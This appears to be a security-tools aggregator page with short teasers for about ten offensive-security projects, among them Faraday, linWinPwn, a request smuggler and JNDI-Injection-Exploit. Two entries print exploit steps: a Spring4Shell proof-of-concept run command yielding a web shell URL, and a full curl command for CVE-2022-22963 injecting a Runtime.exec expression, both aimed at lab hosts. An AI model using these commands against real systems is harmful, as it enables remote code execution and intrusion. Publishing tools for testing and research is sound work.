Faraday was built from within the security community, to make vulnerability management easier and enhance our work. What IDEs are to programming, Faraday is to pentesting. Offensive security had two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve further work. This new update brings: New scanning, reportingRead More
BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at Keenlab. It is based on abstract interpretation with the support from Ghidra. It works on Ghidra’s Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64. InstallationRead More
Description of the vulnerability: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Construction of the POC: https://github.com/BobTheShoplifter/Spring4Shell-POC Steps to Build/Run Tested with JDK 11.0.14, Spring Boot 2.6.5, and Apache Tomcat 9.0.60 Run mvn clean package to build the application Rename demo-0.0.1-SNAPSHOT.war to spring-poc.war and copy this .war file to Tomcat’s webapps directory Run python exp.py –url http://localhost:8080/spring-poc/greeting If successful, the message 漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoamiRead More
linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. The script leverages and is dependent of a number of tools including: impacket, bloodhound, crackmapexec, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump. Setup Git clone the repository and make the script executable git clone https://github.com/lefayjey/linWinPwncd linWinPwn; chmod +x linWinPwn.sh Install LinuxRead More
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’ Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963
PoC for vulnerability in Honda’s Remote Keyless System(CVE-2022-27254) Disclaimer: For educational purposes only. Kindly note that the discoverers for this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth and HackingIntoYourHeart. Others mentioned in this repository are credited for the support that they have provided but have played no active role in any research conductedRead More
Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to request smuggling vulnerability. Usage USAGE: request_smuggler [OPTIONS] –url <url>FLAGS: -h, –help Prints help information -V, –version Prints version informationOPTIONS: –amount-of-payloads <amount-of-payloads> low/medium/all [default: low] -t, –attack-types <attack-types> [ClTeMethod, ClTePath, ClTeTime, TeClMethod, TeClPath, TeClTime] [default: “ClTeTime”Read More
WSVuls Website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.] What’s WSVuls? WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It’s designed for developers/testers and for those workers in IT who want to test vulnerabilities and analyses website from a single command. It detects issuesRead More
JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server. Using this tool allows you get JNDI links, you can insert these links into your POC toRead More
VulnLab A web vulnerability lab project developed by Yavuzlar. Vulnerabilities SQL Injection Cross Site Scripting (XSS) Command Injection Insecure Direct Object References (IDOR) Cross Site Request Forgery (CSRF) XML External Entity (XXE) Insecure Deserialization File Upload File Inclusion Broken Authentication Installation Install with DockerHub If you want to install on DockerHub, just type this command.Read More
